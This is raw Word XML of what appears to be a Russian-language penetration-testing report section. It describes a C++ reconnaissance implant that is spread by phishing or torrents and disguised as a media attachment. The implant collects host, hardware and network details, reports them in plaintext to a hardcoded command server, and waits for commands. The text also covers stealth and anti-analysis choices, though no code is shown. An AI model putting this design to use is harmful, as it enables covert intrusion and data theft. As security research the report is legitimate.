        <w:spacing w:before="90" w:after="9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A44E30" w14:textId="1CF7D84E" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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75A6F4" w14:textId="52B97EFF" w:rsidR="007D31F5" w:rsidRDefault="007D31F5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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49E2FD" w14:textId="77777777" w:rsidR="00483213" w:rsidRDefault="00483213">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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B6ED8E" w14:textId="57CEF013" w:rsidR="002A3235" w:rsidRDefault="002A3235">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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DCEDD5" w14:textId="0E9CD18F" w:rsidR="00FC7AF8" w:rsidRDefault="00FC7AF8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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A0606D" w14:textId="77777777" w:rsidR="00FC7AF8" w:rsidRDefault="00FC7AF8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="90" w:after="9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C45FAA" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D23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Получение данных о скомпрометированной системы </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996D8FF" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D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3.1 Программная реализация</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F791E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D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Было рассмотрено несколько вариантов доставки программы внутрь тестируемого периметра, таких как:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA63C81" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:pStyle w:val="af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709" w:hanging="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D91D23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Фишинг;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BFB14" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:pStyle w:val="af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аскировка под драйвера или системные обновления;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308BFC6B" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:pStyle w:val="af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своего поддельного веб-сайта;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F59A9" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:pStyle w:val="af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Распространение через торренты;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF5221" w14:textId="77777777" w:rsidR="002A3235" w:rsidRPr="00D91D23" w:rsidRDefault="00EE7791" w:rsidP="00D91D23">
      <w:pPr>
        <w:pStyle w:val="af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Распространение через потерян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ные USB-накопители.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE9C80" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D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Решено остановиться на распространении путем использования фишинга, либо через торренты, благодаря своей простоте, отсутствии необходимости затрачивать какие-либо средства.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C68C2E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D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Программный модуль написан на языке программирования С++, что о</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бусловлено рядом условий и требований, предъявляемых к написанному решению:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FC8498" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D2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709" w:hanging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Совместимость – как можно большее количество платформ должно иметь возможность запускать вредоносный код по приказу пользователя системы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6977AAC9" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D2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709" w:hanging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Размер – написанное решение не должно вызывать подозрений своим объемом занимаемой памяти;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDFCC9E" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00D91D2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709" w:hanging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Компактность – все должно помещаться в один файл, не требовать наличия дополнительных файлов, содержащих какие-либо зависимые модули или библиотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB99CF1" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B2520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Полученное решен</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ие занимает не более 34 Кбайт, помещается в один файл, не требовательное к ресурсам машины. Вредоносный файл маскируется под какое-либо вложение\медиафайл.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427B038" w14:textId="24DDC58B" w:rsidR="00266DC4" w:rsidRDefault="00EE7791" w:rsidP="00266DC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попадании в систему пользователя и последующем запуске, происходит отработка полезной нагрузки.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данном случае программа нацелена на сбор информации, никаких вредоносных действий не планируется. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55906977" w14:textId="54BE52A6" w:rsidR="00EB328D" w:rsidRDefault="00266DC4" w:rsidP="00266DC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Написан ряд блоков, отвечающих каждый за определенную часть получаемой информации. Каждый блок использует </w:t>
      </w:r>
      <w:r w:rsidR="00EB328D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">существующее </w:t>
      </w:r>
      <w:r w:rsidR="00EB328D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EB328D" w:rsidRPr="00EB32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328D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="00EB328D" w:rsidRPr="00EB328D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EB328D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> что позволяет не вызывать уведомлений или предупреждений для пользователя и отрабатывать задачу фоном. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBFDE59" w14:textId="5CEA54CB" w:rsidR="00266DC4" w:rsidRDefault="00EB328D" w:rsidP="00EB328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выделить несколько блоков, для понимания работы программы, ее функционала.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C3C923" w14:textId="77DB01AD" w:rsidR="00EB328D" w:rsidRDefault="00EB328D" w:rsidP="00EB328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Первоначально собирается информация о доменном имени машины, получаемая посредством вызова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GetComputerNameEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009228F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (рис.1)</w:t>
      </w:r>
      <w:r w:rsidR="00212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, возвращающая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00212BCD" w:rsidRPr="00212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>NetBIOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00212BCD" w:rsidRPr="00212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">- или DNS-имя, связанное с локальным компьютером. </w:t>
      </w:r>
      <w:r w:rsidR="00212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данные и</w:t>
      </w:r>
      <w:r w:rsidR="00212BCD" w:rsidRPr="00212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мена устанавливаются при запуске системы, когда система считывает их из реестра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DA7579" w14:textId="01BCE161" w:rsidR="00212BCD" w:rsidRPr="00212BCD" w:rsidRDefault="00212BCD" w:rsidP="00EB328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способна вернуть до 8 значений, из которых действительно необходимы лишь </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ComputerNameDnsDomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00212BC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212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ComputerNamePhysicalDnsDomain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первая возвращает </w:t>
      </w:r>
      <w:r w:rsidR="009228F2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212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мя домена DNS, назначенного локальному компьютеру. Если локальный компьютер является узлом в кластере</w:t>
      </w:r>
      <w:r w:rsidRPr="00212B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28F2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212BCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>получает DNS-имя домена виртуального сервера кластера.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Вторая </w:t>
      </w:r>
      <w:r w:rsidR="009228F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>также возвращает и</w:t>
      </w:r>
      <w:r w:rsidR="009228F2" w:rsidRPr="009228F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мя домена DNS, назначенного локальному компьютеру</w:t>
      </w:r>
      <w:r w:rsidR="009228F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, однако е</w:t>
      </w:r>
      <w:r w:rsidR="009228F2" w:rsidRPr="009228F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>сли локальный компьютер является узлом в кластере</w:t>
      </w:r>
      <w:r w:rsidR="009228F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, то</w:t>
      </w:r>
      <w:r w:rsidR="009228F2" w:rsidRPr="00922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28F2" w:rsidRPr="009228F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>получает DNS-имя домена локального компьютера, а не имя виртуального сервера кластера.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC29327" w14:textId="2D00DFE8" w:rsidR="009228F2" w:rsidRDefault="0016524B" w:rsidP="00266DC4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs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                       </w:t>
      </w:r>
      <w:r w:rsidR="00266DC4" w:rsidRPr="00266DC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5368611" wp14:editId="52708696">
            <wp:extent cx="3696114" cy="271462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4053" cy="272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6843" w14:textId="36662FDD" w:rsidR="009228F2" w:rsidRPr="0016524B" w:rsidRDefault="0016524B" w:rsidP="0016524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</w:t>
      </w:r>
      <w:r w:rsidR="009228F2" w:rsidRPr="0016524B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 1 Вызов функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009228F2" w:rsidRPr="0016524B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GetComputerNameEx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009228F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1B5F2F" w14:textId="51487E22" w:rsidR="00B13C91" w:rsidRPr="00B13C91" w:rsidRDefault="009228F2" w:rsidP="00960DF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Следующим шагом сбора информации является получение представления о возможностях системы, поддерживаемая архитектура</w:t>
      </w:r>
      <w:r w:rsidR="00B13C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, базовая ключевая информация. Даная цель достигается вызовом функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B13C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetNativeSystemInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B13C91" w:rsidRPr="00B13C9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B13C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис.2) и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006F64C1" w:rsidRPr="006F64C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GetPhysicallyInstalledSystemMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F64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3C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Рис.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFECBC" w14:textId="77777777" w:rsidR="0016524B" w:rsidRDefault="00B13C91" w:rsidP="0016524B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3C9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3748793" wp14:editId="11FCA2C0">
            <wp:extent cx="6120765" cy="7531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E189" w14:textId="7BB9A369" w:rsidR="006F64C1" w:rsidRPr="006F64C1" w:rsidRDefault="00B13C91" w:rsidP="0016524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 2. Вызов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GetNativeSystemInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F64C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77515D" w14:textId="07919E5D" w:rsidR="006F64C1" w:rsidRPr="0016524B" w:rsidRDefault="00B13C91" w:rsidP="00285DF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обращения к </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00285DFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GetNativeSystemInfo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становится доступна информация об установленном в системе процессоре, его ревизии, поддерживаемой архитектуре, количестве ядер и максимальном количестве </w:t>
      </w:r>
      <w:r w:rsidR="006F64C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>возможных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потоков.</w:t>
      </w:r>
      <w:r w:rsidR="006F64C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Данная информация особенно актуальна, так как существуют уязвимости в самом процессоре, способные стать ключевыми точками для атаки на систему.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC37A1A" w14:textId="7F46751B" w:rsidR="0016524B" w:rsidRDefault="00960DF9" w:rsidP="00B13C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0DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">                      </w:t>
      </w:r>
      <w:r w:rsidR="0016524B" w:rsidRPr="0016524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28661CF" wp14:editId="7862F659">
            <wp:extent cx="3829584" cy="485843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59F0" w14:textId="1D90055C" w:rsidR="0016524B" w:rsidRDefault="00285DFD" w:rsidP="00960DF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16524B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рис. 3 Вызов функции</w:t>
      </w:r>
      <w:r w:rsidR="0016524B" w:rsidRPr="00960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6524B" w:rsidRPr="006F64C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GetPhysicallyInstalledSystemMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0016524B" w:rsidRPr="00960DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0016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DBC21D" w14:textId="77777777" w:rsidR="00436628" w:rsidRDefault="00960DF9" w:rsidP="00285DF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Стоит также отметить, что функция </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F64C1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>GetPhysicallyInstalledSystemMemory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возвращает максимальное установленное количество оперативной памяти в системе в байтах, и необходимо помнить о необходимости либо проведения математических преобразований, либо о единицах измерения возвращаемой величины</w:t>
      </w:r>
      <w:r w:rsidR="0043662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276C19" w14:textId="7A2FFBC7" w:rsidR="00436628" w:rsidRDefault="00436628" w:rsidP="00285DF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 менее важным является сбор информации об Интернет-адаптерах, доступных для использования в системе. Данная информация получается путем обращения к </w:t>
      </w:r>
      <w:r w:rsidR="00164B39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">функции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00164B39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ListIpAddresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00164B39" w:rsidRPr="00164B3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164B39">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис.4). Так будет получено представление о существующих способах проникновения в систему, будет получено представление </w:t>
      </w:r>
      <w:r w:rsidR="00DC6494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">о структуре корпоративной сети – как происходит передача </w:t>
      </w:r>
      <w:r w:rsidR="00DC649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данных между устройствами - посредством </w:t>
      </w:r>
      <w:r w:rsidR="00DC6494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wi</w:t>
      </w:r>
      <w:r w:rsidR="00DC6494" w:rsidRPr="00DC6494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00DC6494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fi</w:t>
      </w:r>
      <w:r w:rsidR="00DC6494">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, или же через кабель.</w:t>
      </w:r>
      <w:r w:rsidR="00164B39" w:rsidRPr="00164B3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73F3475" wp14:editId="5D575751">
            <wp:extent cx="6120765" cy="3611880"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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7927" w14:textId="77777777" w:rsidR="00285DFD" w:rsidRDefault="00DC6494" w:rsidP="00285DFD">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1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4 Обращение к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ListIpAddresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC649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12B001" w14:textId="572FC0B5" w:rsidR="00285DFD" w:rsidRDefault="00DC6494" w:rsidP="00285DF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Финальной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и самой важной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частью программы является блок передачи данных. Реализовано соединение через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на прописанный внутри тела блока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DC6494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адрес командного сервера. После успешной передачи данных происходит переход программы в режим прослушивания и ожидания команд от сервера.</w:t>
      </w:r>
      <w:r w:rsidR="00960DF9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00285DF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 w:rsidRPr="00DC649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B5C2CFF" wp14:editId="5B7E2B43">
            <wp:extent cx="3795205" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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2116" cy="277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64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85DFD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                      Рис. 5 Передача собранных данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42200B9E" w14:textId="72962A27" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00285DF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олученная информация автоматизировано собирается для дальнейшей обработки и происходит попытка установления связи с командно-управляющим сервером. Для передачи данных и установки связи используется протокол TCP, адрес сервера вшит в код программы. Данные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передаются в незашифрованном виде. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626A76A7" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B252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первую очередь это обусловлено рисками обнаружения при попытке использовать криптографические протоколы – в системе будет заметен рост потребности процесса в дополнительных мощностях, необходимых для проведения криптог</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>рафических преобразований и вычислений. Конечно, при перехвате трафика будет сразу ясно, что программа передает данные, что вызовет тревогу у системных администраторов, однако, как показывает практика, рядовой сотрудник не будет смотреть какие данные и куд</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а пересылает программа, а действия системных администраторов будут уже слишком поздно. Исходя из совокупности всех этих факторов и учитывая условия, сложившиеся в данной ситуации, при действиях и вещах, озвученных ранее по ходу повествования решено было от</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>казаться от применения криптографических примитивов в данной работе на текущем этапе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2956BEBC" w14:textId="77777777" w:rsidR="002A3235" w:rsidRDefault="00EE7791" w:rsidP="00B252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было принято решение усложнить структуру программы различными сторонними функциями, на случай попытки рефакторинга программы.</w:t>
      </w:r>
